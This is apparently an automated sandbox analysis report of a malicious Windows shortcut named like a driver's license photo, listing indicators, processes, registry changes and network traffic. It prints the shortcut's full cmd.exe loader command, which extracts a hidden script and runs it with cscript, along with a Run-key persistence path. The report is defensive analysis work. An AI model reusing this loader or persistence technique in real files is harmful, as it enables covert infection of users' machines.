| File name: | Driv License Front.jpg.lnk |
| Full analysis: | https://app.any.run/tasks/89ecdbc0-852d-4b46-859e-83549739e7f7 |
| Verdict: | Malicious activity |
| Analysis date: | February 22, 2020, 08:32:39 |
| OS: | Windows 10 Professional (build: 16299, 64 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 05:29:00 2018, mtime=Tue Feb 13 05:29:00 2018, atime=Tue Feb 13 05:29:00 2018, length=345088, window=hidenormalshowminimized |
| MD5: | EB4827EA9184AFA13229E023C5F7148E |
| SHA1: | 7555DCA670F25E977A250F1B5E1F49A1FE933750 |
| SHA256: | BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111 |
| SSDEEP: | 12288:nCrbIGrJnGcAZETsGb4VTbZXJbhmRMBjmE0qYf3YRHmWXQsA:nCrbzZGcASsGb4Vx5AYQuH70 |
MALICIOUS
Changes internet zones settings
- reg.exe (PID: 6132)
SUSPICIOUS
Starts CMD.EXE for commands execution
- cmd.exe (PID: 5404)
Application launched itself
- cmd.exe (PID: 5404)
- cscript.exe (PID: 2420)
- cscript.exe (PID: 252)
- cscript.exe (PID: 700)
Reads the machine GUID from the registry
- cscript.exe (PID: 2420)
- cscript.exe (PID: 700)
- cscript.exe (PID: 252)
- cscript.exe (PID: 5716)
- backgroundTaskHost.exe (PID: 872)
- SpeechRuntime.exe (PID: 6036)
Modifies the phishing filter of IE
- reg.exe (PID: 6132)
Executes scripts
- cscript.exe (PID: 252)
- cmd.exe (PID: 5404)
- cscript.exe (PID: 2420)
- cscript.exe (PID: 700)
Uses REG.EXE to modify Windows registry
- cscript.exe (PID: 700)
Creates files in the user directory
- cscript.exe (PID: 700)
- cscript.exe (PID: 2420)
- cscript.exe (PID: 5716)
- SystemSettings.exe (PID: 4200)
Executed via COM
- ielowutil.exe (PID: 5204)
- iexplore.exe (PID: 1532)
- iexplore.exe (PID: 4692)
- ApplicationFrameHost.exe (PID: 864)
- SystemSettings.exe (PID: 4200)
- iexplore.exe (PID: 3456)
- ielowutil.exe (PID: 3364)
- RuntimeBroker.exe (PID: 4228)
- backgroundTaskHost.exe (PID: 872)
- SpeechRuntime.exe (PID: 6036)
- iexplore.exe (PID: 2416)
Checks supported languages
- SystemSettings.exe (PID: 4200)
- backgroundTaskHost.exe (PID: 872)
INFO
Changes internet zones settings
- iexplore.exe (PID: 1532)
- iexplore.exe (PID: 4692)
- iexplore.exe (PID: 3456)
- iexplore.exe (PID: 2416)
Reads the machine GUID from the registry
- iexplore.exe (PID: 4692)
- IEXPLORE.EXE (PID: 2300)
- IEXPLORE.EXE (PID: 1164)
- iexplore.exe (PID: 3456)
- IEXPLORE.EXE (PID: 2668)
- iexplore.exe (PID: 1532)
- iexplore.exe (PID: 2416)
- IEXPLORE.EXE (PID: 4688)
Reads settings of System Certificates
- IEXPLORE.EXE (PID: 2300)
- IEXPLORE.EXE (PID: 1164)
- iexplore.exe (PID: 4692)
- iexplore.exe (PID: 1532)
- iexplore.exe (PID: 3456)
- IEXPLORE.EXE (PID: 2668)
- IEXPLORE.EXE (PID: 4688)
Reads internet explorer settings
- IEXPLORE.EXE (PID: 2300)
- IEXPLORE.EXE (PID: 1164)
- IEXPLORE.EXE (PID: 2668)
- IEXPLORE.EXE (PID: 4688)
Reads the software policy settings
- iexplore.exe (PID: 4692)
- IEXPLORE.EXE (PID: 1164)
- IEXPLORE.EXE (PID: 2300)
- iexplore.exe (PID: 1532)
- iexplore.exe (PID: 3456)
- IEXPLORE.EXE (PID: 2668)
- IEXPLORE.EXE (PID: 4688)
Creates files in the user directory
- iexplore.exe (PID: 1532)
- iexplore.exe (PID: 4692)
- iexplore.exe (PID: 3456)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, RelativePath, CommandArgs, IconFile, Unicode, NoLinkInfo, ExpIcon, [16], TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2018:02:13 07:29:00+01:00 |
| AccessDate: | 2018:02:13 07:29:00+01:00 |
| ModifyDate: | 2018:02:13 07:29:00+01:00 |
| TargetFileSize: | 345088 |
| IconIndex: | 2 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | - |
| RelativePath: | ..\..\..\..\..\..\Windows\System32\cmd.exe |
| CommandLineArguments: | /c path=%windir%\system32&&move "Driv License Front.jpg.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "Driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"|find "TRU4">"%tmp%\0.js"|rd a||cSCripT "%tmp%\0.js" |
| IconFileName: | C:\Program Files\Windows NT\Accessories\wordpad.exe |
| MachineID: | admin-pc |
| FillAttributes: | 0x07 |
| PopupFillAttributes: | 0xf5 |
| ScreenBufferSize: | 1 x 1 |
| WindowSize: | 1 x 1 |
| WindowOrigin: | 65532 x 65532 |
| FontSize: | 8 x 12 |
| FontFamily: | Modern |
| FontWeight: | 400 |
| FontName: | Terminal |
| CursorSize: | 25 |
| FullScreen: | No |
| QuickEdit: | No |
| InsertMode: | Yes |
| WindowOriginAuto: | No |
| HistoryBufferSize: | 50 |
| NumHistoryBuffers: | 4 |
| RemoveHistoryDuplicates: | No |
Total processes
118
Monitored processes
32
Malicious processes
2
Suspicious processes
4
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 252 | "C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | C:\Windows\System32\cscript.exe | — | cscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 700 | "C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.js | C:\Windows\System32\cscript.exe | — | cscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 864 | C:\WINDOWS\system32\ApplicationFrameHost.exe -Embedding | C:\WINDOWS\system32\ApplicationFrameHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Application Frame Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 872 | "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca | C:\WINDOWS\system32\backgroundTaskHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Background Task Host Exit code: 1 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1164 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1532 CREDAT:17410 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1396 | forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\WINDOWS\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk" | C:\WINDOWS\system32\forfiles.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 1 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1532 | "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding | C:\Program Files\Internet Explorer\iexplore.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1536 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | cscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2300 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4692 CREDAT:17410 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2416 | "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding | C:\Program Files\Internet Explorer\iexplore.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
8 373
Read events
7 038
Write events
1 331
Delete events
4
Modification events
| (PID) Process: | (2420) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2420) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2420) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2420) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (252) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (252) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (252) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (252) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (5776) reg.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows |
| Operation: | write | Name: | Run |
Value: C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\Media.lnk | |||
| (PID) Process: | (6132) reg.exe | Key: | HKEY_CURRENT_USER\Control Panel\Cursors |
| Operation: | write | Name: | AppStarting |
Value: %SystemRoot%\cursors\aero_arrow.cur | |||
Executable files
0
Suspicious files
104
Text files
178
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5404 | cmd.exe | C:\Users\admin\AppData\Local\Temp\1.lnk | lnk | |
MD5:— | SHA256:— | |||
| 700 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.reg | text | |
MD5:— | SHA256:— | |||
| 2420 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | text | |
MD5:— | SHA256:— | |||
| 700 | cscript.exe | C:\Users\admin\AppData\Local\Temp\reportapi.js | text | |
MD5:— | SHA256:— | |||
| 5812 | find.exe | C:\Users\admin\AppData\Local\Temp\0.js | text | |
MD5:— | SHA256:— | |||
| 700 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\mediaIE.reg | text | |
MD5:— | SHA256:— | |||
| 1164 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZSVOB39W\nav_logo299[1].png | image | |
MD5:— | SHA256:— | |||
| 1164 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLQBH2R9\rs=ACT90oGPD3Nqh3s-0VdAHCbt63X6R8TkUg[1].js | text | |
MD5:— | SHA256:— | |||
| 252 | cscript.exe | C:\Users\admin\AppData\Local\Temp\reportapi.js | text | |
MD5:— | SHA256:— | |||
| 1164 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLJYL64M\IB6KV7W1.htm | html | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
605
TCP/UDP connections
314
DNS requests
148
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1924 | svchost.exe | GET | 204 | 216.58.205.228:443 | https://www.google.com/gen_204?atyp=csi&ei=gOdQXsCDOKG7gwePpbXYBg&s=jsa&jsi=s,t.0,et.focus,n.iDPoPb,cn.1&zx=1582360450048 | US | — | — | malicious |
1924 | svchost.exe | GET | 204 | 216.58.205.228:443 | https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=gOdQXsCDOKG7gwePpbXYBg&rt=wsrt.3,aft.346,prt.346&bl=Clag&ima=0&imad=0&imn=4 | US | — | — | malicious |
1164 | IEXPLORE.EXE | GET | 204 | 216.58.205.228:443 | https://www.google.com/gen_204?atyp=i&ei=gOdQXsCDOKG7gwePpbXYBg&vet=10ahUKEwjAw9uD4OTnAhWh3eAKHY9SDWsQsmQIFA..s&zx=1582360450485 | US | — | — | malicious |
1164 | IEXPLORE.EXE | GET | 200 | 172.217.21.238:443 | https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.OfYsKuVZ3qI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8UDq_6isr1vipw5cUlPTPPdx3_0A/cb=gapi.loaded_0 | US | text | 100 Kb | whitelisted |
1924 | svchost.exe | GET | 200 | 216.58.205.228:443 | https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png | US | image | 665 b | malicious |
1164 | IEXPLORE.EXE | GET | 200 | 216.58.205.228:443 | https://www.google.com/xjs/_/js/k=xjs.s.lt.8suicbkuT8s.O/ck=xjs.s.Oo6j6lD4iBI.L.I11.O/am=AAAAAEsAZt0AAP4HQQAAqGMAAEBAmGBjgTAkpCBWSAAAAQ/d=1/exm=Fkg7bd,HcFEGb,IvlUe,MC8mtf,OF7gzc,RMhBfe,T4BAC,TJw5qb,TbaHGc,Y33vzc,cdos,cr,csi,d,hsm,iDPoPb,jsa,mvYTse,tg8oTe,uz938c,vWNDde,ws9Tlc,yQ43ff/ed=1/dg=2/ct=zgms/rs=ACT90oGPD3Nqh3s-0VdAHCbt63X6R8TkUg/m=GxIAgd,MkHyGd,NpD4ec,OG6ZHd,RqxLvf,T6sTsf,T7XTS,URQPYc,WgDvvc,aa,abd,async,dv7Bfe,dvl,eN4qad,foot,k27Oqb,lu,m,mUpTid,mu,o02Jie,pB6Zqd,rHjpXd,sb_wiz,sf,uiNkee,xz7cCd,zbML3c?xjs=s1 | US | text | 153 Kb | malicious |
1164 | IEXPLORE.EXE | GET | 200 | 216.58.210.14:443 | https://ogs.google.com/widget/app/so?hl=lt&origin=https%3A%2F%2Fwww.google.com&pid=1&spid=1&gm&usegapi=1 | US | html | 39.9 Kb | whitelisted |
1924 | svchost.exe | GET | 200 | 216.58.210.3:443 | https://www.gstatic.com/og/_/js/k=og.og2.en_US.ydJATHv-VrI.O/rt=j/m=def,aswid/exm=in,fot/d=1/ed=1/rs=AA2YrTuPkvWmaj8e-JpiLhfZo2If5z3giw | US | text | 185 Kb | whitelisted |
1924 | svchost.exe | GET | 200 | 216.58.205.228:443 | https://www.google.com/images/nav_logo299.png | US | image | 7.77 Kb | malicious |
1924 | svchost.exe | GET | 200 | 216.58.205.228:443 | https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png | US | image | 13.1 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1164 | IEXPLORE.EXE | 35.231.145.151:443 | gitlab.com | — | US | suspicious |
1164 | IEXPLORE.EXE | 216.58.210.14:443 | ogs.google.com | Google Inc. | US | whitelisted |
1164 | IEXPLORE.EXE | 172.217.21.238:443 | apis.google.com | Google Inc. | US | whitelisted |
1164 | IEXPLORE.EXE | 23.102.47.40:443 | urs.microsoft.com | Microsoft Corporation | IE | unknown |
1164 | IEXPLORE.EXE | 172.217.16.162:443 | adservice.google.com | Google Inc. | US | whitelisted |
1164 | IEXPLORE.EXE | 216.58.206.2:443 | adservice.google.lt | Google Inc. | US | whitelisted |
1164 | IEXPLORE.EXE | 185.62.190.89:80 | — | Dotsi, Unipessoal Lda. | NL | malicious |
1164 | IEXPLORE.EXE | 104.26.11.154:443 | x.dpstatic.com | Cloudflare Inc | US | unknown |
1164 | IEXPLORE.EXE | 216.58.205.228:443 | www.google.com | Google Inc. | US | whitelisted |
1164 | IEXPLORE.EXE | 172.217.23.163:443 | ssl.gstatic.com | Google Inc. | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.google.com |
| malicious |
consent.google.com |
| shared |
ssl.gstatic.com |
| whitelisted |
www.gstatic.com |
| whitelisted |
apis.google.com |
| whitelisted |
ogs.google.com |
| whitelisted |
www.google.lt |
| whitelisted |
adservice.google.com |
| whitelisted |
gitlab.com |
| whitelisted |
adservice.google.lt |
| whitelisted |
Threats
Process | Message |
|---|---|
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |